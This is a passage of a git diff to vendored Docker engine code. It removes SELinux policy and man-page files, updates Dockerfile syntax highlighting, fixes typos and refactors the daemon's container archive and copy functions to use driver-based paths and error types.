domain_entry_file($1, unlabeled_t) -') -interface(`kernel_unlabeled_domtrans',` - gen_require(` - type unlabeled_t; - ') - - read_lnk_files_pattern($1, unlabeled_t, unlabeled_t) - domain_transition_pattern($1, unlabeled_t, $2) - type_transition $1 unlabeled_t:process $2; -') -interface(`files_write_all_pid_sockets',` - gen_require(` - attribute pidfile; - ') - - allow $1 pidfile:sock_file write_sock_file_perms; -') -interface(`dev_dontaudit_mounton_sysfs',` - gen_require(` - type sysfs_t; - ') - - dontaudit $1 sysfs_t:dir mounton; -') diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te deleted file mode 100644 index bad0bb6e4c..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te +++ /dev/null @@ -1,407 +0,0 @@ -policy_module(docker, 1.0.0) - -######################################## -# -# Declarations -# - -## -##

-## Determine whether docker can -## connect to all TCP ports. -##

-##
-gen_tunable(docker_connect_any, false) - -type docker_t; -type docker_exec_t; -init_daemon_domain(docker_t, docker_exec_t) -domain_subj_id_change_exemption(docker_t) -domain_role_change_exemption(docker_t) - -type spc_t; -domain_type(spc_t) -role system_r types spc_t; - -type spc_var_run_t; -files_pid_file(spc_var_run_t) - -type docker_var_lib_t; -files_type(docker_var_lib_t) - -type docker_home_t; -userdom_user_home_content(docker_home_t) - -type docker_config_t; -files_config_file(docker_config_t) - -type docker_lock_t; -files_lock_file(docker_lock_t) - -type docker_log_t; -logging_log_file(docker_log_t) - -type docker_tmp_t; -files_tmp_file(docker_tmp_t) - -type docker_tmpfs_t; -files_tmpfs_file(docker_tmpfs_t) - -type docker_var_run_t; -files_pid_file(docker_var_run_t) - -type docker_unit_file_t; -systemd_unit_file(docker_unit_file_t) - -type docker_devpts_t; -term_pty(docker_devpts_t) - -type docker_share_t; -files_type(docker_share_t) - -######################################## -# -# docker local policy -# -allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap }; -allow docker_t self:tun_socket relabelto; -allow docker_t self:process { getattr signal_perms setrlimit setfscreate }; -allow docker_t self:fifo_file rw_fifo_file_perms; -allow docker_t self:unix_stream_socket create_stream_socket_perms; -allow docker_t self:tcp_socket create_stream_socket_perms; -allow docker_t self:udp_socket create_socket_perms; -allow docker_t self:capability2 block_suspend; - -manage_files_pattern(docker_t, docker_home_t, docker_home_t) -manage_dirs_pattern(docker_t, docker_home_t, docker_home_t) -manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t) -userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker") - -manage_dirs_pattern(docker_t, docker_config_t, docker_config_t) -manage_files_pattern(docker_t, docker_config_t, docker_config_t) -files_etc_filetrans(docker_t, docker_config_t, dir, "docker") - -manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t) -manage_files_pattern(docker_t, docker_lock_t, docker_lock_t) - -manage_dirs_pattern(docker_t, docker_log_t, docker_log_t) -manage_files_pattern(docker_t, docker_log_t, docker_log_t) -manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t) -logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file }) -allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto }; - -manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t) -manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) -manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) -files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file }) - -manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) -allow docker_t docker_tmpfs_t:dir relabelfrom; -can_exec(docker_t, docker_tmpfs_t) -fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file }) -allow docker_t docker_tmpfs_t:chr_file mounton; - -manage_dirs_pattern(docker_t, docker_share_t, docker_share_t) -manage_files_pattern(docker_t, docker_share_t, docker_share_t) -manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t) -allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto }; - -can_exec(docker_t, docker_share_t) -#docker_filetrans_named_content(docker_t) - -manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) -allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto }; -files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file }) - -manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) -files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file }) - -allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms }; -term_create_pty(docker_t, docker_devpts_t) - -kernel_read_system_state(docker_t) -kernel_read_network_state(docker_t) -kernel_read_all_sysctls(docker_t) -kernel_rw_net_sysctls(docker_t) -kernel_setsched(docker_t) -kernel_read_all_proc(docker_t) - -domain_use_interactive_fds(docker_t) -domain_dontaudit_read_all_domains_state(docker_t) - -corecmd_exec_bin(docker_t) -corecmd_exec_shell(docker_t) - -corenet_tcp_bind_generic_node(docker_t) -corenet_tcp_sendrecv_generic_if(docker_t) -corenet_tcp_sendrecv_generic_node(docker_t) -corenet_tcp_sendrecv_generic_port(docker_t) -corenet_tcp_bind_all_ports(docker_t) -corenet_tcp_connect_http_port(docker_t) -corenet_tcp_connect_commplex_main_port(docker_t) -corenet_udp_sendrecv_generic_if(docker_t) -corenet_udp_sendrecv_generic_node(docker_t) -corenet_udp_sendrecv_all_ports(docker_t) -corenet_udp_bind_generic_node(docker_t) -corenet_udp_bind_all_ports(docker_t) - -files_read_config_files(docker_t) -files_dontaudit_getattr_all_dirs(docker_t) -files_dontaudit_getattr_all_files(docker_t) - -fs_read_cgroup_files(docker_t) -fs_read_tmpfs_symlinks(docker_t) -fs_search_all(docker_t) -fs_getattr_all_fs(docker_t) - -storage_raw_rw_fixed_disk(docker_t) - -auth_use_nsswitch(docker_t) -auth_dontaudit_getattr_shadow(docker_t) - -init_read_state(docker_t) -init_status(docker_t) - -logging_send_audit_msgs(docker_t) -logging_send_syslog_msg(docker_t) - -miscfiles_read_localization(docker_t) - -mount_domtrans(docker_t) - -seutil_read_default_contexts(docker_t) -seutil_read_config(docker_t) - -sysnet_dns_name_resolve(docker_t) -sysnet_exec_ifconfig(docker_t) - -optional_policy(` - rpm_exec(docker_t) - rpm_read_db(docker_t) - rpm_exec(docker_t) -') - -optional_policy(` - fstools_domtrans(docker_t) -') - -optional_policy(` - iptables_domtrans(docker_t) -') - -optional_policy(` - openvswitch_stream_connect(docker_t) -') - -allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace }; - -allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms }; - -allow docker_t self:netlink_route_socket rw_netlink_socket_perms;; -allow docker_t self:netlink_audit_socket create_netlink_socket_perms; -allow docker_t self:unix_dgram_socket { create_socket_perms sendto }; -allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto }; - -allow docker_t docker_var_lib_t:dir mounton; -allow docker_t docker_var_lib_t:chr_file mounton; -can_exec(docker_t, docker_var_lib_t) - -kernel_dontaudit_setsched(docker_t) -kernel_get_sysvipc_info(docker_t) -kernel_request_load_module(docker_t) -kernel_mounton_messages(docker_t) -kernel_mounton_all_proc(docker_t) -kernel_mounton_all_sysctls(docker_t) -kernel_unlabeled_entry_type(spc_t) -kernel_unlabeled_domtrans(docker_t, spc_t) - -dev_getattr_all(docker_t) -dev_getattr_sysfs_fs(docker_t) -dev_read_urand(docker_t) -dev_read_lvm_control(docker_t) -dev_rw_sysfs(docker_t) -dev_rw_loop_control(docker_t) -dev_rw_lvm_control(docker_t) - -files_getattr_isid_type_dirs(docker_t) -files_manage_isid_type_dirs(docker_t) -files_manage_isid_type_files(docker_t) -files_manage_isid_type_symlinks(docker_t) -files_manage_isid_type_chr_files(docker_t) -files_manage_isid_type_blk_files(docker_t) -files_exec_isid_files(docker_t) -files_mounton_isid(docker_t) -files_mounton_non_security(docker_t) -files_mounton_isid_type_chr_file(docker_t) - -fs_mount_all_fs(docker_t) -fs_unmount_all_fs(docker_t) -fs_remount_all_fs(docker_t) -files_mounton_isid(docker_t) -fs_manage_cgroup_dirs(docker_t) -fs_manage_cgroup_files(docker_t) -fs_relabelfrom_xattr_fs(docker_t) -fs_relabelfrom_tmpfs(docker_t) -fs_read_tmpfs_symlinks(docker_t) -fs_list_hugetlbfs(docker_t) - -term_use_generic_ptys(docker_t) -term_use_ptmx(docker_t) -term_getattr_pty_fs(docker_t) -term_relabel_pty_fs(docker_t) -term_mounton_unallocated_ttys(docker_t) - -modutils_domtrans_insmod(docker_t) - -systemd_status_all_unit_files(docker_t) -systemd_start_systemd_services(docker_t) - -userdom_stream_connect(docker_t) -userdom_search_user_home_content(docker_t) -userdom_read_all_users_state(docker_t) -userdom_relabel_user_home_files(docker_t) -userdom_relabel_user_tmp_files(docker_t) -userdom_relabel_user_tmp_dirs(docker_t) - -optional_policy(` - gpm_getattr_gpmctl(docker_t) -') - -optional_policy(` - dbus_system_bus_client(docker_t) - init_dbus_chat(docker_t) - init_start_transient_unit(docker_t) - - optional_policy(` - systemd_dbus_chat_logind(docker_t) - ') - - optional_policy(` - firewalld_dbus_chat(docker_t) - ') -') - -optional_policy(` - udev_read_db(docker_t) -') - -optional_policy(` - virt_read_config(docker_t) - virt_exec(docker_t) - virt_stream_connect(docker_t) - virt_stream_connect_sandbox(docker_t) - virt_exec_sandbox_files(docker_t) - virt_manage_sandbox_files(docker_t) - virt_relabel_sandbox_filesystem(docker_t) - virt_transition_svirt_sandbox(docker_t, system_r) - virt_mounton_sandbox_file(docker_t) -# virt_attach_sandbox_tun_iface(docker_t) - allow docker_t svirt_sandbox_domain:tun_socket relabelfrom; -') - -tunable_policy(`docker_connect_any',` - corenet_tcp_connect_all_ports(docker_t) - corenet_sendrecv_all_packets(docker_t) - corenet_tcp_sendrecv_all_ports(docker_t) -') - -######################################## -# -# spc local policy -# -domain_entry_file(spc_t, docker_share_t) -domain_entry_file(spc_t, docker_var_lib_t) -role system_r types spc_t; - -domain_entry_file(spc_t, docker_share_t) -domain_entry_file(spc_t, docker_var_lib_t) -domtrans_pattern(docker_t, docker_share_t, spc_t) -domtrans_pattern(docker_t, docker_var_lib_t, spc_t) -allow docker_t spc_t:process { setsched signal_perms }; -ps_process_pattern(docker_t, spc_t) -allow docker_t spc_t:socket_class_set { relabelto relabelfrom }; - -optional_policy(` - dbus_chat_system_bus(spc_t) -') - -optional_policy(` - unconfined_domain_noaudit(spc_t) -') - -optional_policy(` - unconfined_domain(docker_t) -') - -optional_policy(` - virt_transition_svirt_sandbox(spc_t, system_r) -') - -######################################## -# -# docker upstream policy -# - -optional_policy(` -# domain_stub_named_filetrans_domain() - gen_require(` - attribute named_filetrans_domain; - ') - - docker_filetrans_named_content(named_filetrans_domain) -') - -optional_policy(` - lvm_stub() - docker_rw_sem(lvm_t) -') - -optional_policy(` - staff_stub() - docker_stream_connect(staff_t) - docker_exec(staff_t) -') - -optional_policy(` - virt_stub_svirt_sandbox_domain() - virt_stub_svirt_sandbox_file() - allow svirt_sandbox_domain self:netlink_kobject_uevent_socket create_socket_perms; - docker_read_share_files(svirt_sandbox_domain) - docker_lib_filetrans(svirt_sandbox_domain,svirt_sandbox_file_t, sock_file) - docker_use_ptys(svirt_sandbox_domain) - docker_spc_stream_connect(svirt_sandbox_domain) - fs_list_tmpfs(svirt_sandbox_domain) - fs_rw_hugetlbfs_files(svirt_sandbox_domain) - fs_dontaudit_remount_tmpfs(svirt_sandbox_domain) - dev_dontaudit_mounton_sysfs(svirt_sandbox_domain) - - tunable_policy(`virt_sandbox_use_fusefs',` - fs_manage_fusefs_dirs(svirt_sandbox_domain) - fs_manage_fusefs_files(svirt_sandbox_domain) - fs_manage_fusefs_symlinks(svirt_sandbox_domain) - ') - gen_require(` - attribute domain; - ') - - dontaudit svirt_sandbox_domain domain:key {search link}; -') - -optional_policy(` - gen_require(` - type pcp_pmcd_t; - ') - docker_manage_lib_files(pcp_pmcd_t) -') diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz deleted file mode 100644 index ab5d59445ac1601ca378aaa3e71fb9cff43a1592..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2847 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 xb`W`pZ+>}u<Dockerfile
patterns + + captures + + 1 + + name + keyword.other.special-method.dockerfile + + 2 + + name + keyword.other.special-method.dockerfile + + + match + ^\s*\b(?i:(FROM))\b.*?\b(?i:(AS))\b + captures @@ -25,7 +42,7 @@ match - ^\s*(?:(ONBUILD)\s+)?(ADD|ARG|CMD|COPY|ENTRYPOINT|ENV|EXPOSE|FROM|HEALTHCHECK|LABEL|MAINTAINER|RUN|SHELL|STOPSIGNAL|USER|VOLUME|WORKDIR)\s + ^\s*(?i:(ONBUILD)\s+)?(?i:(ADD|ARG|CMD|COPY|ENTRYPOINT|ENV|EXPOSE|FROM|HEALTHCHECK|LABEL|MAINTAINER|RUN|SHELL|STOPSIGNAL|USER|VOLUME|WORKDIR))\s captures @@ -42,7 +59,7 @@ match - ^\s*(?:(ONBUILD)\s+)?(CMD|ENTRYPOINT)\s + ^\s*(?i:(ONBUILD)\s+)?(?i:(CMD|ENTRYPOINT))\s begin diff --git a/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim b/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim index ee10e5d6a0..a21dd14095 100644 --- a/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim +++ b/vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim @@ -1 +1 @@ -au BufNewFile,BufRead [Dd]ockerfile,Dockerfile.* set filetype=dockerfile +au BufNewFile,BufRead [Dd]ockerfile,[Dd]ockerfile.*,*.[Dd]ockerfile set filetype=dockerfile diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/ns.c b/vendor/github.com/docker/docker/contrib/syscall-test/ns.c index 33684e1c3d..624388630a 100644 --- a/vendor/github.com/docker/docker/contrib/syscall-test/ns.c +++ b/vendor/github.com/docker/docker/contrib/syscall-test/ns.c @@ -20,7 +20,7 @@ static int child_exec(void *stuff) { struct clone_args *args = (struct clone_args *)stuff; if (execvp(args->argv[0], args->argv) != 0) { - fprintf(stderr, "failed to execvp argments %s\n", + fprintf(stderr, "failed to execvp arguments %s\n", strerror(errno)); exit(-1); } diff --git a/vendor/github.com/docker/docker/contrib/syscall-test/userns.c b/vendor/github.com/docker/docker/contrib/syscall-test/userns.c index 2af36f4228..4c5c8d304e 100644 --- a/vendor/github.com/docker/docker/contrib/syscall-test/userns.c +++ b/vendor/github.com/docker/docker/contrib/syscall-test/userns.c @@ -20,7 +20,7 @@ static int child_exec(void *stuff) { struct clone_args *args = (struct clone_args *)stuff; if (execvp(args->argv[0], args->argv) != 0) { - fprintf(stderr, "failed to execvp argments %s\n", + fprintf(stderr, "failed to execvp arguments %s\n", strerror(errno)); exit(-1); } diff --git a/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md b/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md index 286a98504a..736c789998 100644 --- a/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md +++ b/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md @@ -31,11 +31,11 @@ stop on runlevel [!2345] respawn script - /usr/bin/docker daemon -H=tcp://0.0.0.0:2375 + /usr/bin/dockerd -H=tcp://0.0.0.0:2375 end script ``` -Once that's done, you need to set up a SSH tunnel between your host machine and the vagrant machine that's running Docker. This can be done by running the following command in a host terminal: +Once that's done, you need to set up an SSH tunnel between your host machine and the vagrant machine that's running Docker. This can be done by running the following command in a host terminal: ``` ssh -L 2375:localhost:2375 -p 2222 vagrant@localhost diff --git a/vendor/github.com/docker/docker/daemon/apparmor_default.go b/vendor/github.com/docker/docker/daemon/apparmor_default.go index 09dd0541b8..461f5c7f96 100644 --- a/vendor/github.com/docker/docker/daemon/apparmor_default.go +++ b/vendor/github.com/docker/docker/daemon/apparmor_default.go @@ -1,6 +1,6 @@ // +build linux -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" @@ -28,7 +28,7 @@ func ensureDefaultAppArmorProfile() error { // Load the profile. if err := aaprofile.InstallDefault(defaultApparmorProfile); err != nil { - return fmt.Errorf("AppArmor enabled on system but the %s profile could not be loaded.", defaultApparmorProfile) + return fmt.Errorf("AppArmor enabled on system but the %s profile could not be loaded: %s", defaultApparmorProfile, err) } } diff --git a/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go b/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go index cd2dd9702e..51f9c526b3 100644 --- a/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package daemon +package daemon // import "github.com/docker/docker/daemon" func ensureDefaultAppArmorProfile() error { return nil diff --git a/vendor/github.com/docker/docker/daemon/archive.go b/vendor/github.com/docker/docker/daemon/archive.go index 1999f1243b..9c7971b56e 100644 --- a/vendor/github.com/docker/docker/daemon/archive.go +++ b/vendor/github.com/docker/docker/daemon/archive.go @@ -1,20 +1,18 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "errors" "io" "os" - "path/filepath" "strings" "github.com/docker/docker/api/types" - "github.com/docker/docker/builder" "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/chrootarchive" - "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" ) // ErrExtractPointNotDirectory is used to convey that the operation to extract @@ -22,6 +20,31 @@ import ( // path does not refer to a directory. var ErrExtractPointNotDirectory = errors.New("extraction point is not a directory") +// The daemon will use the following interfaces if the container fs implements +// these for optimized copies to and from the container. +type extractor interface { + ExtractArchive(src io.Reader, dst string, opts *archive.TarOptions) error +} + +type archiver interface { + ArchivePath(src string, opts *archive.TarOptions) (io.ReadCloser, error) +} + +// helper functions to extract or archive +func extractArchive(i interface{}, src io.Reader, dst string, opts *archive.TarOptions) error { + if ea, ok := i.(extractor); ok { + return ea.ExtractArchive(src, dst, opts) + } + return chrootarchive.Untar(src, dst, opts) +} + +func archivePath(i interface{}, src string, opts *archive.TarOptions) (io.ReadCloser, error) { + if ap, ok := i.(archiver); ok { + return ap.ArchivePath(src, opts) + } + return archive.TarWithOptions(src, opts) +} + // ContainerCopy performs a deprecated operation of archiving the resource at // the specified path in the container identified by the given name. func (daemon *Daemon) ContainerCopy(name string, res string) (io.ReadCloser, error) { @@ -30,11 +53,20 @@ func (daemon *Daemon) ContainerCopy(name string, res string) (io.ReadCloser, err return nil, err } - if res[0] == '/' || res[0] == '\\' { - res = res[1:] + // Make sure an online file-system operation is permitted. + if err := daemon.isOnlineFSOperationPermitted(container); err != nil { + return nil, errdefs.System(err) } - return daemon.containerCopy(container, res) + data, err := daemon.containerCopy(container, res) + if err == nil { + return data, nil + } + + if os.IsNotExist(err) { + return nil, containerFileNotFound{res, name} + } + return nil, errdefs.System(err) } // ContainerStatPath stats the filesystem resource at the specified path in the @@ -45,7 +77,20 @@ func (daemon *Daemon) ContainerStatPath(name string, path string) (stat *types.C return nil, err } - return daemon.containerStatPath(container, path) + // Make sure an online file-system operation is permitted. + if err := daemon.isOnlineFSOperationPermitted(container); err != nil { + return nil, errdefs.System(err) + } + + stat, err = daemon.containerStatPath(container, path) + if err == nil { + return stat, nil + } + + if os.IsNotExist(err) { + return nil, containerFileNotFound{path, name} + } + return nil, errdefs.System(err) } // ContainerArchivePath creates an archive of the filesystem resource at the @@ -57,7 +102,20 @@ func (daemon *Daemon) ContainerArchivePath(name string, path string) (content io return nil, nil, err } - return daemon.containerArchivePath(container, path) + // Make sure an online file-system operation is permitted. + if err := daemon.isOnlineFSOperationPermitted(container); err != nil { + return nil, nil, errdefs.System(err) + } + + content, stat, err = daemon.containerArchivePath(container, path) + if err == nil { + return content, stat, nil + } + + if os.IsNotExist(err) { + return nil, nil, containerFileNotFound{path, name} + } + return nil, nil, errdefs.System(err) } // ContainerExtractToDir extracts the given archive to the specified location @@ -66,13 +124,26 @@ func (daemon *Daemon) ContainerArchivePath(name string, path string) (content io // be ErrExtractPointNotDirectory. If noOverwriteDirNonDir is true then it will // be an error if unpacking the given content would cause an existing directory // to be replaced with a non-directory and vice versa. -func (daemon *Daemon) ContainerExtractToDir(name, path string, noOverwriteDirNonDir bool, content io.Reader) error { +func (daemon *Daemon) ContainerExtractToDir(name, path string, copyUIDGID, noOverwriteDirNonDir bool, content io.Reader) error { container, err := daemon.GetContainer(name) if err != nil { return err } - return daemon.containerExtractToDir(container, path, noOverwriteDirNonDir, content) + // Make sure an online file-system operation is permitted. + if err := daemon.isOnlineFSOperationPermitted(container); err != nil { + return errdefs.System(err) + } + + err = daemon.containerExtractToDir(container, path, copyUIDGID, noOverwriteDirNonDir, content) + if err == nil { + return nil + } + + if os.IsNotExist(err) { + return containerFileNotFound{path, name} + } + return errdefs.System(err) } // containerStatPath stats the filesystem resource at the specified path in this @@ -92,6 +163,9 @@ func (daemon *Daemon) containerStatPath(container *container.Container, path str return nil, err } + // Normalize path before sending to rootfs + path = container.BaseFS.FromSlash(path) + resolvedPath, absPath, err := container.ResolvePath(path) if err != nil { return nil, err @@ -132,6 +206,9 @@ func (daemon *Daemon) containerArchivePath(container *container.Container, path return nil, nil, err } + // Normalize path before sending to rootfs + path = container.BaseFS.FromSlash(path) + resolvedPath, absPath, err := container.ResolvePath(path) if err != nil { return nil, nil, err @@ -150,7 +227,18 @@ func (daemon *Daemon) containerArchivePath(container *container.Container, path // also catches the case when the root directory of the container is // requested: we want the archive entries to start with "/" and not the // container ID. - data, err := archive.TarResourceRebase(resolvedPath, filepath.Base(absPath)) + driver := container.BaseFS + + // Get the source and the base paths of the container resolved path in order + // to get the proper tar options for the rebase tar. + resolvedPath = driver.Clean(resolvedPath) + if driver.Base(resolvedPath) == "." { + resolvedPath += string(driver.Separator()) + "." + } + sourceDir, sourceBase := driver.Dir(resolvedPath), driver.Base(resolvedPath) + opts := archive.TarResourceRebaseOpts(sourceBase, driver.Base(absPath)) + + data, err := archivePath(driver, sourceDir, opts) if err != nil { return nil, nil, err } @@ -174,7 +262,7 @@ func (daemon *Daemon) containerArchivePath(container *container.Container, path // noOverwriteDirNonDir is true then it will be an error if unpacking the // given content would cause an existing directory to be replaced with a non- // directory and vice versa. -func (daemon *Daemon) containerExtractToDir(container *container.Container, path string, noOverwriteDirNonDir bool, content io.Reader) (err error) { +func (daemon *Daemon) containerExtractToDir(container *container.Container, path string, copyUIDGID, noOverwriteDirNonDir bool, content io.Reader) (err error) { container.Lock() defer container.Unlock() @@ -189,8 +277,12 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path return err } + // Normalize path before sending to rootfs' + path = container.BaseFS.FromSlash(path) + driver := container.BaseFS + // Check if a drive letter supplied, it must be the system drive. No-op except on Windows - path, err = system.CheckSystemDriveAndRemoveDriveLetter(path) + path, err = system.CheckSystemDriveAndRemoveDriveLetter(path, driver) if err != nil { return err } @@ -202,7 +294,10 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path // that you can extract an archive to a symlink that points to a directory. // Consider the given path as an absolute path in the container. - absPath := archive.PreserveTrailingDotOrSeparator(filepath.Join(string(filepath.Separator), path), path) + absPath := archive.PreserveTrailingDotOrSeparator( + driver.Join(string(driver.Separator()), path), + path, + driver.Separator()) // This will evaluate the last path element if it is a symlink. resolvedPath, err := container.GetResourcePath(absPath) @@ -210,7 +305,7 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path return err } - stat, err := os.Lstat(resolvedPath) + stat, err := driver.Lstat(resolvedPath) if err != nil { return err } @@ -233,21 +328,24 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path // a volume file path. var baseRel string if strings.HasPrefix(resolvedPath, `\\?\Volume{`) { - if strings.HasPrefix(resolvedPath, container.BaseFS) { - baseRel = resolvedPath[len(container.BaseFS):] + if strings.HasPrefix(resolvedPath, driver.Path()) { + baseRel = resolvedPath[len(driver.Path()):] if baseRel[:1] == `\` { baseRel = baseRel[1:] } } } else { - baseRel, err = filepath.Rel(container.BaseFS, 